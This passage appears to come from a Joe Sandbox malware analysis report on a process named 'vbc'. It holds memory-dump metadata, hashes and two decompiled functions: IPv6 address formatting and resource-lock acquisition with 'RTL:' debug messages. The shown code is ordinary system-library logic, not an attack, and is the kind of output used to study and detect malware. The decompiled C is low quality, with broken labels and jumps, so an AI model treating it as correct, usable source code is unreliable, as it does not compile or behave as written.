                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                        • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                        • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                        • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A10D0 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                        • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                        • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                        • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A1148 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                        • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                        • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                        • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A010C Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                        • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                        • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                        • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A01D4 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                        • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                        • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                        • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007E13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 38%
                                        			E007E13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = L007D7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x7a2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = L007D7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x7a9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + L007D7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + L007D7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = L007D7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = L007D7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                        0x007e13d5
                                        0x007e13d9
                                        0x007e13dc
                                        0x007e13de
                                        0x007e13e1
                                        0x007e13e8
                                        0x007e13ee
                                        0x0080e8fd
                                        0x00000000
                                        0x0080e921
                                        0x0080e921
                                        0x0080e928
                                        0x0080e982
                                        0x0080e98a
                                        0x00000000
                                        0x0080e99a
                                        0x0080e99e
                                        0x0080e9a3
                                        0x0080e9a8
                                        0x0080e9b9
                                        0x0080e978
                                        0x00000000
                                        0x0080e978
                                        0x0080e98a
                                        0x0080e92a
                                        0x0080e931
                                        0x0080e944
                                        0x0080e944
                                        0x0080e950
                                        0x0080e954
                                        0x0080e959
                                        0x0080e95e
                                        0x0080e963
                                        0x0080e970
                                        0x00000000
                                        0x0080e975
                                        0x0080e93b
                                        0x0080e980
                                        0x00000000
                                        0x0080e980
                                        0x0080e942
                                        0x0080e94b
                                        0x00000000
                                        0x0080e94b
                                        0x00000000
                                        0x0080e942
                                        0x007e13f4
                                        0x007e13f4
                                        0x007e13f9
                                        0x007e13fc
                                        0x007e13ff
                                        0x007e1406
                                        0x0080e9cc
                                        0x0080e9d2
                                        0x0080e9d2
                                        0x0080e9cc
                                        0x007e140c
                                        0x007e1411
                                        0x007e1431
                                        0x007e143a
                                        0x007e143c
                                        0x007e143f
                                        0x007e143f
                                        0x007e1442
                                        0x007e1447
                                        0x007e14a8
                                        0x007e14ac
                                        0x0080e9e2
                                        0x0080e9e7
                                        0x0080e9ec
                                        0x0080ea05
                                        0x0080ea05
                                        0x00000000
                                        0x007e1449
                                        0x00000000
                                        0x007e1449
                                        0x007e144c
                                        0x007e1459
                                        0x007e1462
                                        0x007e1469
                                        0x007e146a
                                        0x007e1470
                                        0x007e1473
                                        0x007e1476
                                        0x007e1476
                                        0x007e1490
                                        0x007e1495
                                        0x007e138e
                                        0x007e1390
                                        0x007e1397
                                        0x007e1398
                                        0x007e1399
                                        0x007e13a1
                                        0x007e13a4
                                        0x007e13a4
                                        0x007e1498
                                        0x007e149c
                                        0x007e149f
                                        0x007e14a2
                                        0x00000000
                                        0x00000000
                                        0x007e14a4
                                        0x00000000
                                        0x007e14a4
                                        0x007e1413
                                        0x007e1415
                                        0x007e1416
                                        0x007e1419
                                        0x007e141c
                                        0x007e1422
                                        0x007e13b7
                                        0x007e13bc
                                        0x007e13bf
                                        0x007e13bf
                                        0x007e13c2
                                        0x007e1424
                                        0x007e1424
                                        0x007e1424
                                        0x007e1427
                                        0x007e142b
                                        0x007e142c
                                        0x007e142c
                                        0x007e142c
                                        0x00000000
                                        0x007e141c
                                        0x007e1411

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 0c7ab71f403a83450c53dfb581e84672ce5204f52f16a4c578590c64ccb71001
                                        • Instruction ID: bc8154718f8efcc430afce5b27e48fb7773c62cddf7de4cc7d75a2a5fa77a64d
                                        • Opcode Fuzzy Hash: 0c7ab71f403a83450c53dfb581e84672ce5204f52f16a4c578590c64ccb71001
                                        • Instruction Fuzzy Hash: 1E6128B1904695EACF34CF5AC8818BFBBB5EFD9300794C52EE5D647681D338AA40CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007E0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E007E0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008801c0;
									_push(_t144);
									_push(0);
									_t51 = L0079F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L007E4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L007F3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L007F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0082217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L007F3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L007E3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008801c0;
												_push(_t138);
												_push(0);
												_t58 = L0079F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L007E4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L007F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L007F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0082217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L007F3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L007E3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E007C5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L0079F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L007E3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L0079F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L007E3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L0079F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L007E3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E007C5329(_t110, _t138);
																_t69 = E007C53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                        0x007e055a
                                        0x007e055d
                                        0x007e0563
                                        0x007e0566
                                        0x007e05d8
                                        0x007e05e2
                                        0x007e05e5
                                        0x00000000
                                        0x007e05e7
                                        0x007e05e7
                                        0x007e05ea
                                        0x007e05f3
                                        0x007e05f3
                                        0x007e0568
                                        0x007e0568
                                        0x007e0568
                                        0x007e0569
                                        0x007e0569
                                        0x007e0569
                                        0x007e056b
                                        0x00000000
                                        0x00000000
                                        0x0080217f
                                        0x00802183
                                        0x0080225b
                                        0x0080225f
                                        0x00802189
                                        0x0080218c
                                        0x0080218f
                                        0x00802194
                                        0x00802199
                                        0x0080219d
                                        0x008021a0
                                        0x008021a2
                                        0x008021ce
                                        0x008021ce
                                        0x008021ce
                                        0x008021d0
                                        0x008021d6
                                        0x008021de
                                        0x008021e2
                                        0x008021e8
                                        0x008021e9
                                        0x008021ec
                                        0x008021f1
                                        0x008021f6
                                        0x00000000
                                        0x00000000
                                        0x008021f8
                                        0x008021fb
                                        0x00802206
                                        0x0080220b
                                        0x0080220c
                                        0x00802217
                                        0x00802226
                                        0x0080222b
                                        0x0080222c
                                        0x0080222f
                                        0x00802232
                                        0x00802235
                                        0x00802235
                                        0x0080223a
                                        0x0080223f
                                        0x00802241
                                        0x00802243
                                        0x00802248
                                        0x00802248
                                        0x0080224d
                                        0x0080224f
                                        0x00802262
                                        0x00802263
                                        0x00802268
                                        0x00802269
                                        0x00802269
                                        0x00802269
                                        0x0080226d
                                        0x00000000
                                        0x00000000
                                        0x00802276
                                        0x00802279
                                        0x0080227e
                                        0x00802283
                                        0x00802287
                                        0x0080228a
                                        0x0080228d
                                        0x0080228f
                                        0x008022bc
                                        0x008022bc
                                        0x008022bc
                                        0x008022be
                                        0x008022c4
                                        0x008022cc
                                        0x008022d0
                                        0x008022d6
                                        0x008022d7
                                        0x008022da
                                        0x008022df
                                        0x008022e4
                                        0x00000000
                                        0x00000000
                                        0x008022e6
                                        0x008022e9
                                        0x008022f4
                                        0x008022f9
                                        0x008022fa
                                        0x00802305
                                        0x00802314
                                        0x00802319
                                        0x0080231a
                                        0x0080231d
                                        0x00802320
                                        0x00802323
                                        0x00802323
                                        0x00802328
                                        0x0080232d
                                        0x0080232f
                                        0x00802331
                                        0x00802336
                                        0x00802336
                                        0x0080233b
                                        0x0080233d
                                        0x00802350
                                        0x00802351
                                        0x00802356
                                        0x00802359
                                        0x00802359
                                        0x0080235b
                                        0x0080235d
                                        0x007c5367
                                        0x007c536b
                                        0x007c5372
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00802363
                                        0x00802363
                                        0x00802369
                                        0x0080236a
                                        0x0080236c
                                        0x00802371
                                        0x00802373
                                        0x00000000
                                        0x00802379
                                        0x00802379
                                        0x0080237a
                                        0x0080237f
                                        0x0080237f
                                        0x00802385
                                        0x00802386
                                        0x00802389
                                        0x0080238e
                                        0x00802390
                                        0x007c5378
                                        0x007c537c
                                        0x00802396
                                        0x00802396
                                        0x00802397
                                        0x0080239c
                                        0x008023a2
                                        0x008023a3
                                        0x008023a6
                                        0x008023ab
                                        0x008023ad
                                        0x00000000
                                        0x008023b3
                                        0x008023b3
                                        0x008023b4
                                        0x008023b9
                                        0x008023ba
                                        0x008023ba
                                        0x008023bc
                                        0x008023bf
                                        0x00000000
                                        0x00000000
                                        0x007f9153
                                        0x007f9158
                                        0x007f915a
                                        0x007f915e
                                        0x007f9160
                                        0x00000000
                                        0x007f9166
                                        0x007f9166
                                        0x007f9171
                                        0x007f9176
                                        0x007f9176
                                        0x00000000
                                        0x007f9160
                                        0x008023c6
                                        0x008023ce
                                        0x008023d7
                                        0x008023d7
                                        0x008023ad
                                        0x00802390
                                        0x00802373
                                        0x0080233f
                                        0x0080233f
                                        0x00000000
                                        0x0080233f
                                        0x00802291
                                        0x00802291
                                        0x00802293
                                        0x00802295
                                        0x0080229a
                                        0x008022a1
                                        0x008022a3
                                        0x008022a7
                                        0x008022a9
                                        0x00000000
                                        0x00000000
                                        0x008022ab
                                        0x008022ad
                                        0x008022af
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x008022af
                                        0x008022b1
                                        0x008022b4
                                        0x008022b4
                                        0x008022b6
                                        0x007c53be
                                        0x007c53be
                                        0x007c53be
                                        0x007c53c0
                                        0x00000000
                                        0x00000000
                                        0x007c53cb
                                        0x007c53ce
                                        0x007c53d0
                                        0x007c53d4
                                        0x007c53d6
                                        0x00000000
                                        0x007c53d8
                                        0x007c53e3
                                        0x007c53ea
                                        0x007c53ea
                                        0x00000000
                                        0x007c53d6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x008022b6
                                        0x00000000
                                        0x0080228f
                                        0x00802349
